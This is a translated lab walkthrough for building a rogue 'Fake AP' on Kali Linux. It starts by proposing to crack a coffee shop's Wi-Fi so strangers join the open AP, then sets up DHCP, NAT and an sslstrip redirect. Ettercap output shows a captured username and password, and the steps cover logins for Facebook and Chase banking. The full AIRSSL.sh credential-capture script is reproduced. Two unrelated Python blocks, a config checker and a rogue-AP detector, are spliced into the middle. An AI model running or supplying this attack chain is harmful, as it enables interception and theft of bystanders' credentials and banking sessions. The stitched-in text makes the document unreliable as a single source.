Fake AP Configuration
After hacking a wireless LAN, set up a Fake AP configured as an open network so that phones attach to it automatically and can use the internet. Wi-Fi has a higher priority than mobile data, so devices connect to it first; this is what is exploited. The victim ends up communicating through it without knowing. Crack the coffee shop Wi-Fi password, connect to it, then configure Kali Linux as a Soft AP and leave it open. Other people then browse the internet through it, and their packets are handled as if ARP spoofing were in place.
(Note) The lab can only be done with wireless adapters that show up as wlan#/mon#. /* If your interface names differ, adapt the commands accordingly
(Before the lab)
# airmon-ng stop mon0
# service network-manager restart
# service networking restart
① Check that the internet works
# cat /etc/resolv.conf
nameserver 168.126.63.1 |
# nslookup www.daum.net
Server:         192.168.10.2
Address:        192.168.10.2#53

Non-authoritative answer:
www.daum.net    canonical name = www.g.daum.net.
Name:   www.g.daum.net
Address: 117.52.2.237
Name:   www.g.daum.net
Address: 117.52.2.238 |
# apt-cache search dhcp /* search for dhcp packages
② Install the DHCP server package /* The Soft AP must be able to hand out IP addresses to clients via DHCP.
# apt-get -y install isc-dhcp-server
패키지 목록을 읽는 중입니다... 완료
의존성 트리를 만드는 중입니다
상태 정보를 읽는 중입니다... 완료
주의, 'dhcp3-server' 대신에 'isc-dhcp-server' 패키지를 선택합니다
제안하는 패키지:
  isc-dhcp-server-ldap
다음 새 패키지를 설치할 것입니다:
  isc-dhcp-server
0개 업그레이드, 1개 새로 설치, 0개 제거 및 173개 업그레이드 안 함.
936 k바이트 아카이브를 받아야 합니다.
이 작업 후 2,225 k바이트의 디스크 공간을 더 사용하게 됩니다.
경고: 다음 패키지를 인증할 수 없습니다!
  isc-dhcp-server
확인하지 않고 패키지를 설치하시겠습니까 [y/N]? y
받기:1 http://http.kali.org/kali/ kali/main isc-dhcp-server i386 4.2.2.dfsg.1-5+deb70u6 [936 kB]
내려받기 936 k바이트, 소요시간 10초 (88.0 k바이트/초)
패키지를 미리 설정하는 중입니다...
Selecting previously unselected package isc-dhcp-server.
(데이터베이스 읽는중 ...현재 349119개의 파일과 디렉터리가 설치되어 있습니다.)
isc-dhcp-server 패키지를 푸는 중입니다 (.../isc-dhcp-server_4.2.2.dfsg.1-5+deb70u6_i386.deb에서) ...
man-db에 대한 트리거를 처리하는 중입니다 ...
isc-dhcp-server (4.2.2.dfsg.1-5+deb70u6) 설정하는 중입니다 ...
Generating /etc/default/isc-dhcp-server...
update-rc.d: We have no instructions for the isc-dhcp-server init script.
update-rc.d: It looks like a network service, we disable it.
.... (omitted) ..... |
[Reference] isc-dhcp-server configuration files
/etc/dhcp/dhcpd.conf            main configuration file
/etc/init.d/isc-dhcp-server     service control script (start/stop/restart)
/etc/default/isc-dhcp-server    default variables read by the daemon
/usr/sbin/dhcpd                 the dhcpd daemon
/var/run/dhcpd.pid              file holding the PID of the running dhcpd daemon
# dpkg -L isc-dhcp-server
/.
/var
/var/run
/var/lib
/var/lib/dhcp
/etc
/etc/dhcp
/etc/dhcp/dhcpd.conf                /* main configuration file
/etc/init.d
/etc/init.d/isc-dhcp-server         /* startup script that launches the daemon
/usr
/usr/share
/usr/share/doc
/usr/share/doc/isc-dhcp-server
/usr/share/doc/isc-dhcp-server/copyright
/usr/share/doc/isc-dhcp-server/README.Debian
/usr/share/doc/isc-dhcp-server/NEWS.Debian.gz
/usr/share/doc/isc-dhcp-server/changelog.Debian.gz
/usr/share/doc/isc-dhcp-server/examples
/usr/share/doc/isc-dhcp-server/examples/dhcpd.conf
/usr/share/man
/usr/share/man/man8
/usr/share/man/man8/dhcpd.8.gz
/usr/share/man/man5
/usr/share/man/man5/dhcpd.conf.5.gz
/usr/share/man/man5/dhcpd.leases.5.gz
/usr/share/lintian
/usr/share/lintian/overrides
/usr/share/lintian/overrides/isc-dhcp-server
/usr/sbin
/usr/sbin/dhcpd                     /* the daemon |
③ Check the wireless LAN network configuration
                       Kali Linux
Gateway -------------- eth0 (Fake wireless AP) wlan1(mon0/at0) ----- (Phone)
192.168.10.2           192.168.10.50            192.168.100.1        192.168.100.X
- wlan1 is the wireless side; the phone's traffic passes through wlan1 and eth0 and leaves via the Gateway.
■ Fake AP components
- (ㄱ) Fake AP /* The phone must be able to find the AP by name when it scans.
- (ㄴ) DHCP Server /* When the phone taps the AP it requests a connection, and the server must hand out an IP.
- (ㄷ) NAT (+ routing table setup + IP forwarding) /* Clients normally receive private IPs, so NAT is needed for them to reach the outside through this host. NAT covers inside-to-outside; replies coming from outside to inside are handled by the routing table.
# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:13:97:4a
          inet addr:192.168.10.50  Bcast:192.168.10.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe13:974a/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:88 errors:0 dropped:0 overruns:0 frame:0
          TX packets:102 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:9272 (9.0 KiB)  TX bytes:12273 (11.9 KiB)
          Interrupt:19 Base address:0x2000

eth1      Link encap:Ethernet  HWaddr 00:0c:29:13:97:54
          inet addr:192.168.20.50  Bcast:192.168.20.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe13:9754/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:18 errors:0 dropped:0 overruns:0 frame:0
          TX packets:19 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:1319 (1.2 KiB)  TX bytes:1270 (1.2 KiB)
          Interrupt:19 Base address:0x2080

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:12 errors:0 dropped:0 overruns:0 frame:0
          TX packets:12 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:720 (720.0 B)  TX bytes:720 (720.0 B)

wlan1     Link encap:Ethernet  HWaddr 00:08:9f:f2:9c:19
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B) |
(Run these commands if needed)
# ifconfig /* Shows only active interfaces, so one that is down does not appear.
# ifconfig -a /* Shows all interfaces, active and inactive.
# ifconfig wlan1 up
# iwconfig
# ifconfig eth1 down
# ifconfig
④ DHCP server configuration
-------------------------------------------
(Debian family)              (RedHat family)
-------------------------------------------
# dpkg -l                    # rpm -qa
# dpkg -L isc-dhcp-server    # rpm -ql <PKG>
-------------------------------------------
# cd /etc/dhcp
# mv dhcpd.conf dhcpd.conf.old /* main configuration file
# vi /etc/dhcp/dhcpd.conf
authoritative;
default-lease-time 600;          /* in seconds
max-lease-time 7200;             /* lease time: how long the DHCP server grants the address.
                                 /* It is renewed again and again; once the MAX value is reached the lease expires.
subnet 192.168.100.0 netmask 255.255.255.0 {
    option subnet-mask 255.255.255.0;
    option broadcast-address 192.168.100.255;
    option routers 192.168.100.1;              /* address of wlan1
    option domain-name "free1";                /* the FAKE AP name as the phone sees it
    option domain-name-servers 192.168.100.1;
    range 192.168.100.2 192.168.100.254;
}
/* Many values can be supplied and controlled here, such as host names. |
Gateway -------------- eth0 (Fake wireless AP) wlan1(mon0/at0) ----- (Phone)
192.168.10.2           192.168.10.50            192.168.100.1        192.168.100.X
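As an added consistency check (not part of the original notes), the Python script below parses a dhcpd.conf subnet block like the one above and verifies that the pool, gateway, DNS, mask and broadcast values all agree with the declared subnet. The configuration text is embedded as a constructed sample; the parser understands only the small subset of dhcpd.conf syntax used here.

```python
import re
import ipaddress

# Constructed sample input: the subnet block from the notes above.
SAMPLE_CONF = """
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.100.0 netmask 255.255.255.0 {
    option subnet-mask 255.255.255.0;
    option broadcast-address 192.168.100.255;
    option routers 192.168.100.1;
    option domain-name "free1";
    option domain-name-servers 192.168.100.1;
    range 192.168.100.2 192.168.100.254;
}
"""


def parse_dhcpd_conf(text):
    """Parse the subset of dhcpd.conf used above: global lease times plus one
    subnet block with its options and range. Returns a plain dict."""
    conf = {"default_lease": None, "max_lease": None, "options": {}, "range": None}
    m = re.search(r"^\s*default-lease-time\s+(\d+);", text, re.M)
    if m:
        conf["default_lease"] = int(m.group(1))
    m = re.search(r"^\s*max-lease-time\s+(\d+);", text, re.M)
    if m:
        conf["max_lease"] = int(m.group(1))
    m = re.search(r"subnet\s+(\S+)\s+netmask\s+(\S+)\s*\{(.*?)\}", text, re.S)
    if not m:
        raise ValueError("no subnet block found")
    # strict=True rejects a subnet address that has host bits set
    conf["subnet"] = ipaddress.ip_network("%s/%s" % (m.group(1), m.group(2)), strict=True)
    body = m.group(3)
    for name, value in re.findall(r"option\s+([\w-]+)\s+([^;]+);", body):
        conf["options"][name] = value.strip().strip('"')
    m = re.search(r"range\s+(\S+)\s+(\S+);", body)
    if m:
        conf["range"] = (ipaddress.ip_address(m.group(1)), ipaddress.ip_address(m.group(2)))
    return conf


def check_dhcpd_conf(conf):
    """Return a list of problems; an empty list means the block is self-consistent."""
    problems = []
    net, rng, opts = conf["subnet"], conf["range"], conf["options"]

    if conf["default_lease"] and conf["max_lease"] and conf["default_lease"] > conf["max_lease"]:
        problems.append("default-lease-time exceeds max-lease-time")

    if rng is None:
        problems.append("no range declared, so clients cannot get dynamic leases")
    else:
        lo, hi = rng
        if lo > hi:
            problems.append("range start %s is after range end %s" % (lo, hi))
        for addr in (lo, hi):
            if addr not in net:
                problems.append("range address %s is outside %s" % (addr, net))
        if lo == net.network_address or hi == net.broadcast_address:
            problems.append("range includes the network or broadcast address")

    # The mask/broadcast options must agree with the subnet declaration.
    if "subnet-mask" in opts and opts["subnet-mask"] != str(net.netmask):
        problems.append("option subnet-mask %s does not match netmask %s" % (opts["subnet-mask"], net.netmask))
    if "broadcast-address" in opts and opts["broadcast-address"] != str(net.broadcast_address):
        problems.append("option broadcast-address %s does not match %s" % (opts["broadcast-address"], net.broadcast_address))

    # Gateway and DNS must be on-link; if they sit inside the dynamic pool a client
    # could be leased the router's own address and break the whole segment.
    for name in ("routers", "domain-name-servers"):
        for token in opts.get(name, "").split(","):
            token = token.strip()
            if not token:
                continue
            addr = ipaddress.ip_address(token)
            if addr not in net:
                problems.append("option %s %s is outside %s" % (name, addr, net))
            elif rng and rng[0] <= addr <= rng[1]:
                problems.append("option %s %s lies inside the dynamic range" % (name, addr))
    return problems


if __name__ == "__main__":
    for line in check_dhcpd_conf(parse_dhcpd_conf(SAMPLE_CONF)) or ["config is consistent"]:
        print(line)
```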
[Reference] Building a caching-only DNS server
# apt-get -y install bind9 bind9-doc bind9-host bind9utils
# service bind9 restart
# service bind9 status
- Just install and start it, and it acts as a caching-only DNS server.
⑤ Switch the wlan# interface to monitor mode
# airmon-ng start wlan1
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID     Name
11735   NetworkManager
11755   wpa_supplicant

Interface       Chipset                 Driver
wlan0           Ralink RT2870/3070      rt2800usb - [phy1]
                                        (monitor mode enabled on mon0) |
# airmon-ng check kill (# kill 11735 11755)
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID     Name
11735   NetworkManager
11755   wpa_supplicant
Killing all those processes... |
# iwconfig
lo        no wireless extensions.

mon0      IEEE 802.11bgn  Mode:Monitor  Frequency:2.412 GHz  Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

eth0      no wireless extensions.

eth1      no wireless extensions.

wlan1     IEEE 802.11bgn  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off |
⑥ Building the Fake AP
Gateway -------------- eth0 (Fake wireless AP) wlan1(mon0/at0) ----- (Phone)
192.168.10.2           192.168.10.50            192.168.100.1        192.168.100.X
- wlan1 is the wireless side; the phone's traffic passes through wlan1 and eth0 and leaves via the Gateway.
■ Fake AP components
- (ㄱ) Fake AP
- (ㄴ) DHCP Server
- (ㄷ) NAT (+ routing table setup + IP forwarding)
# airbase-ng -c 4 --essid free1 mon0 /* choose a channel that nearby APs rarely use */
/* essid: the network name shown to users
18:07:04  Created tap interface at0
18:07:04  Trying to set MTU on at0 to 1500
18:07:04  Trying to set MTU on mon0 to 1800
18:07:04  Access Point with BSSID 00:08:9F:F2:9C:19 started. |
- The AP is now up; do not terminate this process.
airbase-ng - multi-purpose tool aimed at attacking clients as opposed to the Access Point (AP) itself
-a bssid : set Access Point MAC address
-c channel : sets the channel the AP is running on
--essid ESSID : specify a single ESSID (default: default)
-W 0|1 : [don't] set WEP flag in beacons 0|1 (default: auto)
(On the phone) Confirm that a fake AP named free1 is visible.
- DHCP is configured but the daemon is not running yet, so the phone cannot connect yet.
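A defender's counterpart to the step above, added here and not part of the original notes: the Python script parses a scan table in airodump-ng's summary layout and flags beacons that reuse a trusted SSID from an unknown radio or as an open network, which is how a client-side or WIDS check would spot an AP like free1. The trusted-network baseline and the scan lines are constructed sample data; only the 00:08:9F:F2:9C:19 BSSID is taken from the airbase-ng output above.

```python
import re

# Constructed baseline: the networks the operator actually runs. Assumed
# values (BSSIDs, security) that are not taken from the notes.
TRUSTED = {
    "free1": {"bssids": {"aa:bb:cc:dd:ee:01"}, "security": "WPA2"},
    "CoffeeShop": {"bssids": {"aa:bb:cc:dd:ee:10", "aa:bb:cc:dd:ee:11"}, "security": "WPA2"},
}

# Constructed scan output in the column layout of airodump-ng's AP summary
# (BSSID, channel, encryption, ESSID). The 00:08:9F... entry mirrors the
# BSSID airbase-ng reported above; every other row is invented.
SAMPLE_SCAN = """\
BSSID              CH  ENC   ESSID
AA:BB:CC:DD:EE:01   6  WPA2  free1
00:08:9F:F2:9C:19   4  OPN   free1
AA:BB:CC:DD:EE:10   1  WPA2  CoffeeShop
3C:A3:15:02:6A:DE   1  WPA2  CoffeeShop
DE:AD:BE:EF:00:01  11  OPN   Guest
"""

# One MAC address, a channel number, an encryption label, then the SSID.
ROW_RE = re.compile(r"^([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})\s+(\d+)\s+(\S+)\s+(.+?)\s*$")


def parse_scan(text):
    """Turn the scan table into a list of dicts with normalised (lower-case) BSSIDs."""
    beacons = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # header line or noise
        bssid, ch, enc, essid = m.groups()
        beacons.append({"bssid": bssid.lower(), "channel": int(ch),
                        "security": enc.upper(), "essid": essid})
    return beacons


def find_rogue_aps(beacons, trusted):
    """Flag beacons that reuse a trusted SSID from an unknown radio or with weaker
    security. Returns (severity, bssid, essid, reason) tuples in scan order."""
    findings = []
    for b in beacons:
        base = trusted.get(b["essid"])
        if base is None:
            continue  # not one of our SSIDs, so nothing to compare against
        known_radio = b["bssid"] in base["bssids"]
        open_twin = b["security"] == "OPN" and base["security"] != "OPN"
        if open_twin:
            # An open network advertising a protected SSID is the classic evil twin:
            # clients that have the SSID saved may auto-join it.
            findings.append(("high", b["bssid"], b["essid"],
                             "open network using protected SSID (channel %d)" % b["channel"]))
        elif not known_radio:
            findings.append(("medium", b["bssid"], b["essid"],
                             "trusted SSID from unknown BSSID (channel %d)" % b["channel"]))
    return findings


if __name__ == "__main__":
    for severity, bssid, essid, reason in find_rogue_aps(parse_scan(SAMPLE_SCAN), TRUSTED):
        print("[%s] %s %s: %s" % (severity.upper(), bssid, essid, reason))
```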
[TERM2] New terminal
# iwconfig
wlan0     IEEE 802.11abgn  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

lo        no wireless extensions.

mon0      IEEE 802.11abgn  Mode:Monitor  Frequency:2.427 GHz  Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

eth0      no wireless extensions.

eth1      no wireless extensions.

at0       no wireless extensions.        /* Soft AP virtual interface |
-> at0 is present
# ifconfig at0 up
# ifconfig at0
at0       Link encap:Ethernet  HWaddr 3c:a3:15:02:6a:de
          inet6 addr: fe80::3ea3:15ff:fe02:6ade/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:500
          RX bytes:0 (0.0 B)  TX bytes:508 (508.0 B)
..... (omitted) ..... |
# ifconfig at0 192.168.100.1 netmask 255.255.255.0
# ifconfig at0 mtu 1400
# ifconfig at0
at0       Link encap:Ethernet  HWaddr 00:08:9f:f2:9c:19
          inet addr:192.168.100.1  Bcast:192.168.100.255  Mask:255.255.255.0
          inet6 addr: fe80::208:9fff:fef2:9c19/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1400  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:500
          RX bytes:0 (0.0 B)  TX bytes:648 (648.0 B) |
# route add -net 192.168.100.0 netmask 255.255.255.0 gw 192.168.100.1
/* network IP
- Traffic from inside the VM to the outside works, but sometimes the Windows host cannot reach inside the VM; that happens when the route is not registered in the routing table.
# route -n (# netstat -nr)
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         192.168.10.2    0.0.0.0         UG    0      0        0 eth0
192.168.10.0    0.0.0.0         255.255.255.0   U     0      0        0 eth0
192.168.20.0    0.0.0.0         255.255.255.0   U     0      0        0 eth1
192.168.100.0   192.168.100.1   255.255.255.0   UG    0      0        0 at0
192.168.100.0   0.0.0.0         255.255.255.0   U     0      0        0 at0 |
# echo 1 > /proc/sys/net/ipv4/ip_forward (# sysctl -w net.ipv4.ip_forward=1 ; sysctl -p)
-> Turn on IPv4 forwarding
# iptables -F (# iptables --flush)
-> Flush the rules of the filter table (the default table)
# iptables -t nat -F (# iptables --table nat --flush)
-> Flush the rules of the nat table
# iptables -X (# iptables --delete-chain)
-> Delete user-defined chains in the filter table (the default table)
# iptables -t nat -X (# iptables --table nat --delete-chain)
-> Delete user-defined chains in the nat table
# route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         192.168.10.2    0.0.0.0         UG    0      0        0 eth0
192.168.10.0    0.0.0.0         255.255.255.0   U     0      0        0 eth0
192.168.20.0    0.0.0.0         255.255.255.0   U     0      0        0 eth1
192.168.100.0   192.168.100.1   255.255.255.0   UG    0      0        0 at0
192.168.100.0   0.0.0.0         255.255.255.0   U     0      0        0 at0 |
# iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.10.2
# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
/* nat table, Append, tcp, port 80: rewrite the destination to port 10000, i.e. redirect to 10000, where sslstrip is listening.
(# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000)
# iptables -P FORWARD ACCEPT /* -P : policy */
-> Set the default policy of the FORWARD chain to ACCEPT
# iptables -A FORWARD -i at0 -j ACCEPT /* -i : in-bound device, -j : jump */
-> Add a rule to the FORWARD chain
(# iptables --append FORWARD --in-interface at0 -j ACCEPT)
# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE /* -o : out-bound device */
-> Add a rule to the POSTROUTING chain of the nat table (masquerading) /* this is what builds the NAT table
(# iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE)
# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination
ACCEPT     all  --  anywhere             anywhere

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination |
# iptables -L -t nat
Chain PREROUTING (policy ACCEPT)
target     prot opt source               destination
DNAT       udp  --  anywhere             anywhere             to:192.168.10.2
REDIRECT   tcp  --  anywhere             anywhere             tcp dpt:http redir ports 10000

Chain INPUT (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination

Chain POSTROUTING (policy ACCEPT)
target     prot opt source               destination
MASQUERADE  all  --  anywhere             anywhere |
# service isc-dhcp-server start
(dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0)
[FAIL] Stopping ISC DHCP server: dhcpd failed!
[ ok ] Starting ISC DHCP server: dhcpd. |
# pgrep -lf dhcpd
4803 /usr/sbin/dhcpd -q -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid |
-> Confirm the daemon is running
# sslstrip -f -p -k 10000
sslstrip 0.9 by Moxie Marlinspike running... |
- Do not terminate it.
sslstrip - SSL/TLS man-in-the-middle attack tool
-f , --favicon Substitute a lock favicon on secure requests.
-p , --post Log only SSL POSTs. (default)
-k , --killsessions Kill sessions in progress.
[TERM3] Another terminal
# man ettercap
Sniffing and Attack options:
-p, --nopromisc do not put the iface in promisc mode
-u, --unoffensive do not forward packets
User Interface Type:
-T, --text use text only GUI
-q, --quiet do not display packet contents
General options:
-i, --iface <iface> use this network interface
# ettercap -p -u -T -q -i at0 /* text mode
ettercap 0.8.0 copyright 2001-2013 Ettercap Development Team

Listening on:
  at0 -> 00:00:00:00:00:00
          192.168.100.1/255.255.255.0
          fe80::66e5:99ff:fef2:c59d/64

Privileges dropped to UID 65534 GID 65534...

  33 plugins
  42 protocol dissectors
  57 ports monitored
16074 mac vendor fingerprint
 1766 tcp OS fingerprint
 2182 known services

Starting Unified sniffing...

Text only Interface activated...
Hit 'h' for inline help

DHCP: [08:3D:88:1E:79:FD] DISCOVER
DHCP: [192.168.100.1] OFFER : 192.168.100.2 255.255.255.0 GW 192.168.100.1 DNS 192.168.100.1 "free1"
DHCP: [08:3D:88:1E:79:FD] REQUEST 192.168.100.2
DHCP: [192.168.100.1] ACK : 192.168.100.2 255.255.255.0 GW 192.168.100.1 DNS 192.168.100.1 "free1"
HTTP : 110.45.215.107:80 -> USER: jang4scjaja  PASS: n1  INFO: http://www.daum.net/
CONTENT: url=http%3A%2F%2Fwww.daum.net%2F%3Ft__nil_top%3Dlogin&weblogin=1&slevel=1&id=jang4scjaja&pw=n1
..... (omitted) ..... |
DHCP DISCOVER - the client looks for a DHCP server by broadcast.
DHCP OFFER - the server announces "I am a DHCP server".
DHCP REQUEST - the client asks for the DHCP configuration.
DHCP ACK - the server delivers the configuration by unicast.
= Conclusion - the phone really received an IP address
(Note) If wlan1 is down, be sure to bring it up.
# ifconfig
# ifconfig -a
# ifconfig wlan1 up
(On the phone) Connect to the wireless network and browse the internet (log in to the naver website).
Check the assigned network settings with the Quick System Information app.
-> Go through the login process.
-> Check the ettercap screen.
facebook.com
-> Go through the login process.
-> Check the ettercap screen.
wordpress.com
-> Go through the login process.
-> Check the ettercap screen.
www.chase.com (online banking)
-> Go through the login process.
-> Check the ettercap screen.
# cat sslstrip.log
-> Check the log file.
=> Through sslstrip the packets can be seen in plaintext. If the user does something like online banking
[Reference] YouTube videos
https://www.youtube.com/watch?v=HePt2J4uSno (recommended)
https://www.youtube.com/watch?v=dA-i7jAVwMs
[Reference] YouTube videos
https://www.youtube.com/watch?v=CdqhNN1OfHY
- Fake Wireless Access Point Creation-Rogue AP (HD)
- (FakeAP.sh source code : https://github.com/hacker404/Air-sslstrip-/blob/master/Air-ssl.sh)
■ FakeAP.sh script /* A script that builds a Fake AP; use it as a reference for writing your own
#!/bin/bash
# (C)opyright 2009 - killadaninja - Modified H4m4d4 2014
# airssl.sh - v1.0
# visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

# configure your Network
# Network questions
echo
echo "AIRSSL 2.0 - Credits killadaninja & h4m4d4 "
echo
route -n -A inet | grep UG
echo
echo
echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: "
read -e gatewayip
echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: "
read -e internet_interface
echo -n "Enter your interface to be used for the fake AP, for example wlan0: "
read -e fakeap_interface
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
airmon-ng start $fakeap_interface      # switch the adapter to monitor mode
fakeap=$fakeap_interface
fakeap_interface="mon0"

# Dhcpd creation
mkdir -p "/pentest/wireless/airssl"
echo "authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;
range 10.0.0.20 10.0.0.50;
}" > /pentest/wireless/airssl/dhcpd.conf     # writes the configuration shown above into the file

# Fake ap setup
echo "[+] Configuring FakeAP...."
echo
echo "Airbase-ng will run in its most basic mode, would you like to configure any extra switches? "
echo
echo "Choose Y to see airbase-ng help and add switches. "
echo "Choose N to run airbase-ng in basic mode with your choosen ESSID. "
echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "
echo "Y, N or A "
read ANSWER

if [ $ANSWER = "y" ] ; then
    airbase-ng --help
fi

if [ $ANSWER = "y" ] ; then
    echo
    echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be redefined, also in this mode you MUST define a channel "
    read -e aswitch
    echo
    echo "[+] Starting FakeAP..."
    # xterm opens a new terminal window for each tool
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface &
    fakeapid=$!
    sleep 2
fi

if [ $ANSWER = "a" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface &
    fakeapid=$!
    sleep 2
fi

if [ $ANSWER = "n" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface &
    fakeapid=$!
    sleep 2
fi

# Tables
echo "[+] Configuring forwarding tables..."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

# DHCP
echo "[+] Setting up DHCP..."
touch /var/run/dhcpd.pid
chown dhcpd:dhcpd /var/run/dhcpd.pid
xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 &
dchpid=$!
sleep 3

# Sslstrip
echo "[+] Starting sslstrip..."
xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 &
sslstripid=$!
sleep 2

# Ettercap
echo "[+] Configuring ettercap..."
echo
echo "Ettercap will run in its most basic mode, would you like to configure any extra switches for example to load plugins or filters, (advanced users only), if you are unsure choose N "
echo "Y or N "
read ETTER
if [ $ETTER = "y" ] ; then
    ettercap --help
fi

if [ $ETTER = "y" ] ; then
    echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here For the sake of airssl, ettercap WILL USE -u and -p so you are advised NOT to use -M, also -i is already set and CANNOT be redifined here. Ettercaps output will be saved to /pentest/wireless/airssl/passwords DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
    echo
    read "eswitch"
    echo "[+] Starting ettercap..."
    # launches ettercap in its own window
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 &
    ettercapid=$!
    sleep 1
fi

if [ $ETTER = "n" ] ; then
    echo
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 &
    ettercapid=$!
    sleep 1
fi

# Driftnet
echo
echo "[+] Driftnet?"
echo
echo "Would you also like to start driftnet to capture the victims images, (this may make the network a little slower), "
echo "Y or N "
read DRIFT

if [ $DRIFT = "y" ] ; then
    mkdir -p "/pentest/wireless/airssl/driftnetdata"     # to view images from the clients' web pages
    echo "[+] Starting driftnet..."
    driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata &
    dritnetid=$!
    sleep 3
fi

xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log &
sslstriplogid=$!

clear
echo
echo "[+] Activated..."
echo "Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
echo
echo "[+] IMPORTANT..."
